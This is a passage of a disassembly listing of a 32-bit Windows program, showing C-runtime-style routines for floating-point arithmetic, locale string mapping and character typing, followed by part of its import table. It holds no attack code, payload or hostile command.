var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_432A48
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+var_4], eax
xor eax, eax
xor ecx, ecx
mov cx, [ebx+0Ah]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_18], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov ax, [esi+0Ah]
push edi
mov edi, ecx
mov edx, 7FFFh
and ecx, edx
xor edi, eax
and eax, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_4217D0
cmp cx, 7FFFh
jnb loc_4217D0
cmp dx, 0BFFDh
ja loc_4217D0
cmp dx, 3FBFh
ja short loc_421639
xor eax, eax
jmp short loc_421673
; ---------------------------------------------------------------------------
loc_421639: ; CODE XREF: sub_4215C3+70�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_42165B
inc [ebp+arg_0]
xor eax, eax
test [esi+8], edx
jnz short loc_42165D
cmp [esi+4], eax
jnz short loc_42165D
cmp [esi], eax
jnz short loc_42165D
jmp loc_4217CA
; ---------------------------------------------------------------------------
loc_42165B: ; CODE XREF: sub_4215C3+7E�j
xor eax, eax
loc_42165D: ; CODE XREF: sub_4215C3+88�j
; sub_4215C3+8D�j ...
cmp cx, ax
jnz short loc_421680
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_421680
cmp [ebx+4], eax
jnz short loc_421680
cmp [ebx], eax
jnz short loc_421680
loc_421673: ; CODE XREF: sub_4215C3+74�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_4217EB
; ---------------------------------------------------------------------------
loc_421680: ; CODE XREF: sub_4215C3+9D�j
; sub_4215C3+A5�j ...
mov [ebp+var_14], eax
lea eax, [ebp+var_24]
mov [ebp+var_8], eax
mov [ebp+arg_4], 5
loc_421690: ; CODE XREF: sub_4215C3+12F�j
mov eax, [ebp+var_14]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_4216E4
add eax, esi
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [ebx+8]
mov [ebp+var_10], ecx
mov [ebp+var_1C], eax
loc_4216AC: ; CODE XREF: sub_4215C3+11F�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
movzx ecx, word ptr [ecx]
movzx eax, word ptr [eax]
imul eax, ecx
mov ecx, [ebp+var_8]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_420AC9
add esp, 0Ch
test eax, eax
jz short loc_4216D7
mov eax, [ebp+var_8]
inc word ptr [eax]
loc_4216D7: ; CODE XREF: sub_4215C3+10C�j
add [ebp+var_C], 2
sub [ebp+var_10], 2
dec [ebp+var_1C]
jnz short loc_4216AC
loc_4216E4: ; CODE XREF: sub_4215C3+D6�j
add [ebp+var_8], 2
inc [ebp+var_14]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_421690
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_421727
loc_421702: ; CODE XREF: sub_4215C3+15B�j
test byte ptr [ebp+var_20+3], 80h
jnz short loc_421720
lea eax, [ebp+var_28]
push eax
call sub_420B48
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
pop ecx
jg short loc_421702
loc_421720: ; CODE XREF: sub_4215C3+143�j
cmp word ptr [ebp+arg_0], 0
jg short loc_421760
loc_421727: ; CODE XREF: sub_4215C3+13D�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_421760
mov eax, [ebp+arg_0]
neg eax
movzx ebx, ax
add [ebp+arg_0], ebx
loc_421740: ; CODE XREF: sub_4215C3+191�j
test byte ptr [ebp+var_28], 1
jz short loc_421749
inc [ebp+var_18]
loc_421749: ; CODE XREF: sub_4215C3+181�j
lea eax, [ebp+var_28]
push eax
call sub_420B76
dec ebx
pop ecx
jnz short loc_421740
cmp [ebp+var_18], 0
jz short loc_421760
or byte ptr [ebp+var_28], 1
loc_421760: ; CODE XREF: sub_4215C3+162�j
; sub_4215C3+170�j ...
cmp word ptr [ebp+var_28], 8000h
ja short loc_421777
mov eax, [ebp+var_28]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_4217AC
loc_421777: ; CODE XREF: sub_4215C3+1A3�j
cmp [ebp+var_28+2], 0FFFFFFFFh
jnz short loc_4217A9
and [ebp+var_28+2], 0
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_4217A4
and [ebp+var_24+2], 0
cmp word ptr [ebp+var_20+2], 0FFFFh
jnz short loc_42179E
inc [ebp+arg_0]
mov word ptr [ebp+var_20+2], 8000h
jmp short loc_4217AC
; ---------------------------------------------------------------------------
loc_42179E: ; CODE XREF: sub_4215C3+1CE�j
inc word ptr [ebp+var_20+2]
jmp short loc_4217AC
; ---------------------------------------------------------------------------
loc_4217A4: ; CODE XREF: sub_4215C3+1C2�j
inc [ebp+var_24+2]
jmp short loc_4217AC
; ---------------------------------------------------------------------------
loc_4217A9: ; CODE XREF: sub_4215C3+1B8�j
inc [ebp+var_28+2]
loc_4217AC: ; CODE XREF: sub_4215C3+1B2�j
; sub_4215C3+1D9�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_4217D0
mov cx, word ptr [ebp+var_28+2]
mov [esi], cx
mov ecx, [ebp+var_24]
mov [esi+2], ecx
mov ecx, [ebp+var_20]
mov [esi+6], ecx
or eax, edi
loc_4217CA: ; CODE XREF: sub_4215C3+93�j
mov [esi+0Ah], ax
jmp short loc_4217EB
; ---------------------------------------------------------------------------
loc_4217D0: ; CODE XREF: sub_4215C3+4F�j
; sub_4215C3+5A�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_4217EB: ; CODE XREF: sub_4215C3+B8�j
; sub_4215C3+20B�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41C526
leave
retn
sub_4215C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4217FB proc near ; CODE XREF: sub_420C87+39F�p
; sub_4210C1+144�p
var_10 = byte ptr -10h
var_E = dword ptr -0Eh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_432A48
xor eax, [ebp+4]
push ebx
mov ebx, offset dword_432F00
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
mov [ebp+var_4], eax
jz short loc_421879
jge short loc_421829
neg [ebp+arg_4]
mov ebx, offset dword_433060
sub ebx, 60h
loc_421829: ; CODE XREF: sub_4217FB+21�j
cmp [ebp+arg_8], ecx
jnz short loc_421834
mov eax, [ebp+arg_0]
mov [eax], cx
loc_421834: ; CODE XREF: sub_4217FB+31�j
cmp [ebp+arg_4], ecx
jz short loc_421879
push esi
push edi
loc_42183B: ; CODE XREF: sub_4217FB+7A�j
mov eax, [ebp+arg_4]
sar [ebp+arg_4], 3
and eax, 7
add ebx, 54h
cmp eax, ecx
jz short loc_421872
lea eax, [eax+eax*2]
lea esi, [ebx+eax*4]
cmp word ptr [esi], 8000h
jb short loc_421865
lea edi, [ebp+var_10]
movsd
movsd
movsd
dec [ebp+var_E]
lea esi, [ebp+var_10]
loc_421865: ; CODE XREF: sub_4217FB+5C�j
push esi
push [ebp+arg_0]
call sub_4215C3
pop ecx
pop ecx
xor ecx, ecx
loc_421872: ; CODE XREF: sub_4217FB+4F�j
cmp [ebp+arg_4], ecx
jnz short loc_42183B
pop edi
pop esi
loc_421879: ; CODE XREF: sub_4217FB+1F�j
; sub_4217FB+3C�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop ebx
call sub_41C526
leave
retn
sub_4217FB endp
; =============== S U B R O U T I N E =======================================
sub_421887 proc near ; CODE XREF: sub_40718D+31�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_4218AE
push esi
call sub_419D00
inc eax
push eax
call sub_416DAF
test eax, eax
pop ecx
pop ecx
jz short loc_4218AE
push esi
push eax
call sub_41BF70
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4218AE: ; CODE XREF: sub_421887+7�j
; sub_421887+1A�j
xor eax, eax
pop esi
retn
sub_421887 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4218C0 proc near ; CODE XREF: sub_404260+14A�p
jmp dword_4221F4
sub_4218C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4218C6 proc near ; CODE XREF: sub_4179C1+24�p
; sub_417CF0+13�p
jmp dword_422164
sub_4218C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4218CC proc near ; CODE XREF: sub_403999+DA�p
; sub_403999+F1�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
call sub_41915F
mov ecx, [eax+64h]
cmp ecx, off_4323DC
mov [ebp+var_4], ecx
jz short loc_4218ED
call sub_419F8E
mov [ebp+var_4], eax
mov ecx, eax
loc_4218ED: ; CODE XREF: sub_4218CC+15�j
cmp dword ptr [ecx+14h], 0
push ebx
jnz short loc_421932
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
loc_4218FA: ; CODE XREF: sub_4218CC+62�j
xor ebx, ebx
mov bx, [ecx]
cmp bx, 41h
jb short loc_42190E
cmp bx, 5Ah
ja short loc_42190E
add ebx, 20h
loc_42190E: ; CODE XREF: sub_4218CC+37�j
; sub_4218CC+3D�j
xor eax, eax
mov ax, [edx]
cmp ax, 41h
jb short loc_421922
cmp ax, 5Ah
ja short loc_421922
add eax, 20h
loc_421922: ; CODE XREF: sub_4218CC+4B�j
; sub_4218CC+51�j
inc ecx
inc ecx
inc edx
inc edx
test bx, bx
jz short loc_42196E
cmp bx, ax
jz short loc_4218FA
jmp short loc_42196E
; ---------------------------------------------------------------------------
loc_421932: ; CODE XREF: sub_4218CC+26�j
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
jmp short loc_42193F
; ---------------------------------------------------------------------------
loc_42193C: ; CODE XREF: sub_4218CC+9E�j
mov ecx, [ebp+var_4]
loc_42193F: ; CODE XREF: sub_4218CC+6E�j
xor eax, eax
mov ax, [esi]
push eax
push ecx
call sub_421979
inc esi
inc esi
mov ebx, eax
xor eax, eax
mov ax, [edi]
push eax
push [ebp+var_4]
call sub_421979
add esp, 10h
inc edi
inc edi
test bx, bx
jz short loc_42196C
cmp bx, ax
jz short loc_42193C
loc_42196C: ; CODE XREF: sub_4218CC+99�j
pop edi
pop esi
loc_42196E: ; CODE XREF: sub_4218CC+5D�j
; sub_4218CC+64�j
movzx ecx, ax
movzx eax, bx
sub eax, ecx
pop ebx
leave
retn
sub_4218CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421979 proc near ; CODE XREF: sub_4218CC+7A�p
; sub_4218CC+8C�p
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, 0FFFFh
cmp word ptr [ebp+arg_4], ax
jz short locret_4219D8
cmp word ptr [ebp+arg_4], 100h
push esi
mov esi, [ebp+arg_0]
jnb short loc_4219AC
push 1
push [ebp+arg_4]
push esi
call sub_421C33
add esp, 0Ch
test eax, eax
jnz short loc_4219AC
mov ax, word ptr [ebp+arg_4]
jmp short loc_4219D7
; ---------------------------------------------------------------------------
loc_4219AC: ; CODE XREF: sub_421979+19�j
; sub_421979+2B�j
push dword ptr [esi+4]
lea eax, [ebp+var_4]
push 1
push eax
push 1
lea eax, [ebp+arg_4]
push eax
push 100h
push dword ptr [esi+14h]
call sub_4219DA
add esp, 1Ch
test eax, eax
mov ax, word ptr [ebp+arg_4]
jz short loc_4219D7
mov ax, [ebp+var_4]
loc_4219D7: ; CODE XREF: sub_421979+31�j
; sub_421979+58�j
pop esi
locret_4219D8: ; CODE XREF: sub_421979+D�j
leave
retn
sub_421979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4219DA proc near ; CODE XREF: sub_421979+4A�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push 24h
push offset stru_42CE20
call __SEH_prolog
xor ebx, ebx
xor edi, edi
inc edi
cmp dword_4815BC, ebx
jnz short loc_421A28
push ebx
push ebx
push edi
push offset dword_42C150
push 100h
push ebx
call dword_4221A8 ; LCMapStringW
test eax, eax
jz short loc_421A13
mov dword_4815BC, edi
jmp short loc_421A28
; ---------------------------------------------------------------------------
loc_421A13: ; CODE XREF: sub_4219DA+2F�j
call dword_422004 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_421A28
mov dword_4815BC, 2
loc_421A28: ; CODE XREF: sub_4219DA+17�j
; sub_4219DA+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_421A4A
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_421A33: ; CODE XREF: sub_4219DA+63�j
dec ecx
cmp [eax], bx
jz short loc_421A42
inc eax
inc eax
cmp ecx, ebx
jnz short loc_421A33
or ecx, 0FFFFFFFFh
loc_421A42: ; CODE XREF: sub_4219DA+5D�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_421A4A: ; CODE XREF: sub_4219DA+51�j
mov eax, dword_4815BC
cmp eax, edi
jnz short loc_421A70
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A8 ; LCMapStringW
jmp loc_421C2A
; ---------------------------------------------------------------------------
loc_421A70: ; CODE XREF: sub_4219DA+77�j
cmp eax, 2
jz short loc_421A79
cmp eax, ebx
jnz short loc_421ACD
loc_421A79: ; CODE XREF: sub_4219DA+99�j
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_24], ebx
cmp [ebp+arg_0], ebx
jnz short loc_421A8F
mov eax, dword_481478
mov [ebp+arg_0], eax
loc_421A8F: ; CODE XREF: sub_4219DA+AB�j
cmp [ebp+arg_18], ebx
jnz short loc_421A9C
mov eax, dword_481488
mov [ebp+arg_18], eax
loc_421A9C: ; CODE XREF: sub_4219DA+B8�j
push [ebp+arg_0]
call sub_42027F
pop ecx
cmp [ebp+arg_18], eax
jz short loc_421AB2
cmp eax, 0FFFFFFFFh
jz short loc_421AB2
mov [ebp+arg_18], eax
loc_421AB2: ; CODE XREF: sub_4219DA+CE�j
; sub_4219DA+D3�j
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push [ebp+arg_18]
call dword_4220D8 ; WideCharToMultiByte
mov [ebp+var_28], eax
cmp eax, ebx
jnz short loc_421AD4
loc_421ACD: ; CODE XREF: sub_4219DA+9D�j
; sub_4219DA+141�j
xor eax, eax
jmp loc_421C2A
; ---------------------------------------------------------------------------
loc_421AD4: ; CODE XREF: sub_4219DA+F1�j
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B20
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_421B08
; ---------------------------------------------------------------------------
loc_421AF0: ; DATA XREF: .text:stru_42CE20�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_421AF4: ; DATA XREF: .text:stru_42CE20�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C068
xor ebx, ebx
mov [ebp+var_2C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor edi, edi
inc edi
loc_421B08: ; CODE XREF: sub_4219DA+114�j
cmp [ebp+var_2C], ebx
jnz short loc_421B20
push [ebp+var_28]
call sub_416DAF
pop ecx
mov [ebp+var_2C], eax
cmp eax, ebx
jz short loc_421ACD
mov [ebp+var_20], edi
loc_421B20: ; CODE XREF: sub_4219DA+131�j
push ebx
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_C]
push [ebp+arg_8]
push ebx
push [ebp+arg_18]
call dword_4220D8 ; WideCharToMultiByte
test eax, eax
jz loc_421C0A
push ebx
push ebx
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A4 ; LCMapStringA
mov esi, eax
mov [ebp+var_30], esi
cmp esi, ebx
jz loc_421C0A
mov [ebp+ms_exc.disabled], edi
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B20
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_34], edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_421B94
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41C068
xor ebx, ebx
xor edi, edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_30]
loc_421B94: ; CODE XREF: sub_4219DA+1A1�j
cmp edi, ebx
jnz short loc_421BAC
push esi
call sub_416DAF
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_421C0D
mov [ebp+var_24], 1
loc_421BAC: ; CODE XREF: sub_4219DA+1BC�j
push esi
push edi
push [ebp+var_28]
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4221A4 ; LCMapStringA
test eax, eax
jz short loc_421C0D
test byte ptr [ebp+arg_4+1], 4
jz short loc_421BE9
mov [ebp+var_1C], esi
cmp [ebp+arg_14], ebx
jz short loc_421C0D
cmp [ebp+arg_14], esi
jge short loc_421BDA
mov esi, [ebp+arg_14]
loc_421BDA: ; CODE XREF: sub_4219DA+1FB�j
push esi
push edi
push [ebp+arg_10]
call sub_4169C0
add esp, 0Ch
jmp short loc_421C0D
; ---------------------------------------------------------------------------
loc_421BE9: ; CODE XREF: sub_4219DA+1EE�j
cmp [ebp+arg_14], ebx
jnz short loc_421BF2
push ebx
push ebx
jmp short loc_421BF8
; ---------------------------------------------------------------------------
loc_421BF2: ; CODE XREF: sub_4219DA+212�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_421BF8: ; CODE XREF: sub_4219DA+216�j
push esi
push edi
push 1
push [ebp+arg_18]
call dword_4220D4 ; MultiByteToWideChar
mov [ebp+var_1C], eax
jmp short loc_421C0D
; ---------------------------------------------------------------------------
loc_421C0A: ; CODE XREF: sub_4219DA+160�j
; sub_4219DA+181�j
mov edi, [ebp+var_34]
loc_421C0D: ; CODE XREF: sub_4219DA+1C9�j
; sub_4219DA+1E8�j ...
cmp [ebp+var_24], ebx
jz short loc_421C19
push edi
call sub_416C97
pop ecx
loc_421C19: ; CODE XREF: sub_4219DA+236�j
cmp [ebp+var_20], ebx
jz short loc_421C27
push [ebp+var_2C]
call sub_416C97
pop ecx
loc_421C27: ; CODE XREF: sub_4219DA+242�j
mov eax, [ebp+var_1C]
loc_421C2A: ; CODE XREF: sub_4219DA+91�j
; sub_4219DA+F5�j
lea esp, [ebp-40h]
call __SEH_epilog
retn
sub_4219DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421C33 proc near ; CODE XREF: sub_421979+21�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0FFFFh
jz short loc_421C78
cmp [ebp+arg_4], 100h
jnb short loc_421C57
movzx eax, [ebp+arg_4]
mov ecx, off_432A44
mov ax, [ecx+eax*2]
jmp short loc_421C7F
; ---------------------------------------------------------------------------
loc_421C57: ; CODE XREF: sub_421C33+12�j
mov eax, [ebp+arg_0]
push dword ptr [eax+14h]
push dword ptr [eax+4]
lea eax, [ebp+var_4]
push eax
push 1
lea eax, [ebp+arg_4]
push eax
push 1
call sub_421C8A
add esp, 18h
test eax, eax
jnz short loc_421C7C
loc_421C78: ; CODE XREF: sub_421C33+A�j
xor eax, eax
jmp short loc_421C7F
; ---------------------------------------------------------------------------
loc_421C7C: ; CODE XREF: sub_421C33+43�j
mov eax, [ebp+var_4]
loc_421C7F: ; CODE XREF: sub_421C33+22�j
; sub_421C33+47�j
movzx ecx, [ebp+arg_8]
movzx eax, ax
and eax, ecx
leave
retn
sub_421C33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421C8A proc near ; CODE XREF: sub_421C33+39�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push 24h
push offset stru_42CE38
call __SEH_prolog
xor esi, esi
xor edi, edi
inc edi
cmp dword_4815C0, esi
jnz short loc_421CD5
lea eax, [ebp+var_1C]
push eax
push edi
push offset dword_42C150
push edi
call dword_422158 ; GetStringTypeW
test eax, eax
jz short loc_421CC0
mov dword_4815C0, edi
jmp short loc_421CD5
; ---------------------------------------------------------------------------
loc_421CC0: ; CODE XREF: sub_421C8A+2C�j
call dword_422004 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_421CD5
mov dword_4815C0, 2
loc_421CD5: ; CODE XREF: sub_421C8A+17�j
; sub_421C8A+34�j ...
mov eax, dword_4815C0
cmp eax, edi
jnz short loc_421CF5
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_422158 ; GetStringTypeW
jmp loc_421EA6
; ---------------------------------------------------------------------------
loc_421CF5: ; CODE XREF: sub_421C8A+52�j
cmp eax, 2
jz short loc_421CFE
cmp eax, esi
jnz short loc_421D51
loc_421CFE: ; CODE XREF: sub_421C8A+6E�j
mov [ebp+var_20], esi
mov [ebp+var_24], esi
cmp [ebp+arg_14], esi
jnz short loc_421D11
mov eax, dword_481478
mov [ebp+arg_14], eax
loc_421D11: ; CODE XREF: sub_421C8A+7D�j
cmp [ebp+arg_10], esi
jnz short loc_421D1E
mov eax, dword_481488
mov [ebp+arg_10], eax
loc_421D1E: ; CODE XREF: sub_421C8A+8A�j
push [ebp+arg_14]
call sub_42027F
pop ecx
cmp [ebp+arg_10], eax
jz short loc_421D34
cmp eax, 0FFFFFFFFh
jz short loc_421D34
mov [ebp+arg_10], eax
loc_421D34: ; CODE XREF: sub_421C8A+A0�j
; sub_421C8A+A5�j
push esi
push esi
push esi
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push esi
push [ebp+arg_10]
call dword_4220D8 ; WideCharToMultiByte
mov ebx, eax
mov [ebp+var_28], ebx
cmp ebx, esi
jnz short loc_421D58
loc_421D51: ; CODE XREF: sub_421C8A+72�j
; sub_421C8A+126�j
xor eax, eax
jmp loc_421EA6
; ---------------------------------------------------------------------------
loc_421D58: ; CODE XREF: sub_421C8A+C5�j
mov [ebp+ms_exc.disabled], esi
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B20
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
push ebx
push esi
push eax
call sub_41E880
add esp, 0Ch
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_421D9D
; ---------------------------------------------------------------------------
loc_421D81: ; DATA XREF: .text:stru_42CE38�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_421D85: ; DATA XREF: .text:stru_42CE38�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C068
and [ebp+var_2C], 0
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor edi, edi
inc edi
mov ebx, [ebp+var_28]
xor esi, esi
loc_421D9D: ; CODE XREF: sub_421C8A+F5�j
cmp [ebp+var_2C], esi
jnz short loc_421DB5
push ebx
push edi
call sub_41E5AE
pop ecx
pop ecx
mov [ebp+var_2C], eax
cmp eax, esi
jz short loc_421D51
mov [ebp+var_20], edi
loc_421DB5: ; CODE XREF: sub_421C8A+116�j
push esi
push esi
push ebx
push [ebp+var_2C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
push [ebp+arg_10]
call dword_4220D8 ; WideCharToMultiByte
test eax, eax
jz loc_421E95
mov [ebp+ms_exc.disabled], edi
lea eax, [ebx+ebx+2]
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B20
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_30], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_421E0F
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_41C068
and [ebp+var_30], 0
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor edi, edi
inc edi
mov ebx, [ebp+var_28]
xor esi, esi
loc_421E0F: ; CODE XREF: sub_421C8A+167�j
cmp [ebp+var_30], esi
jnz short loc_421E29
lea eax, [ebx+ebx+2]
push eax
call sub_416DAF
pop ecx
mov [ebp+var_30], eax
cmp eax, esi
jz short loc_421E95
mov [ebp+var_24], edi
loc_421E29: ; CODE XREF: sub_421C8A+188�j
cmp [ebp+arg_14], esi
jnz short loc_421E36
mov eax, dword_481478
mov [ebp+arg_14], eax
loc_421E36: ; CODE XREF: sub_421C8A+1A2�j
mov edi, [ebp+arg_8]
add edi, edi
mov eax, [ebp+var_30]
lea esi, [edi+eax]
or word ptr [esi], 0FFFFh
or word ptr [esi-2], 0FFFFh
push eax
push ebx
push [ebp+var_2C]
push [ebp+arg_0]
push [ebp+arg_14]
call dword_4221D8 ; GetStringTypeA
mov [ebp+var_34], eax
cmp word ptr [esi-2], 0FFFFh
jz short loc_421E80
cmp word ptr [esi], 0FFFFh
jnz short loc_421E80
push edi
push [ebp+var_30]
push [ebp+arg_C]
call sub_41EFF0
add esp, 0Ch
jmp short loc_421E84
; ---------------------------------------------------------------------------
loc_421E80: ; CODE XREF: sub_421C8A+1DC�j
; sub_421C8A+1E3�j
and [ebp+var_34], 0
loc_421E84: ; CODE XREF: sub_421C8A+1F4�j
cmp [ebp+var_24], 0
jz short loc_421E93
push [ebp+var_30]
call sub_416C97
pop ecx
loc_421E93: ; CODE XREF: sub_421C8A+1FE�j
xor esi, esi
loc_421E95: ; CODE XREF: sub_421C8A+143�j
; sub_421C8A+19A�j
cmp [ebp+var_20], esi
jz short loc_421EA3
push [ebp+var_2C]
call sub_416C97
pop ecx
loc_421EA3: ; CODE XREF: sub_421C8A+20E�j
mov eax, [ebp+var_34]
loc_421EA6: ; CODE XREF: sub_421C8A+66�j
; sub_421C8A+C9�j
lea esp, [ebp-40h]
call __SEH_epilog
retn
sub_421C8A endp
; ---------------------------------------------------------------------------
mov eax, dword_43A7C8
and eax, 0FFFFFFFEh
mov dword_43A7C8, eax
retn
; ---------------------------------------------------------------------------
loc_421EBD: ; DATA XREF: sub_407B65�o
mov eax, offset dword_42CE68
jmp loc_417A13
; ---------------------------------------------------------------------------
align 4
dd 4Eh dup(0)
dword_422000 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401141+277�r ...
dword_422004 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_401141+264�r ...
dword_422008 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_401141+247�r ...
dword_42200C dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401141+17F�r ...
dword_422010 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_401B65+251�r ...
dword_422014 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; sub_41A0D2+D�r ...
dword_422018 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; sub_41A166+28�r ...
dword_42201C dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_402B61+27�r ...
dword_422020 dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCountdword_422024 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSection ; sub_401B65+241�r ...
dword_422028 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTime ; sub_405DD1+F�r
dword_42202C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_402C2F+1EF�r ...
dword_422030 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_402183+1C3�r ...
dword_422034 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_402C2F+5D�r ...
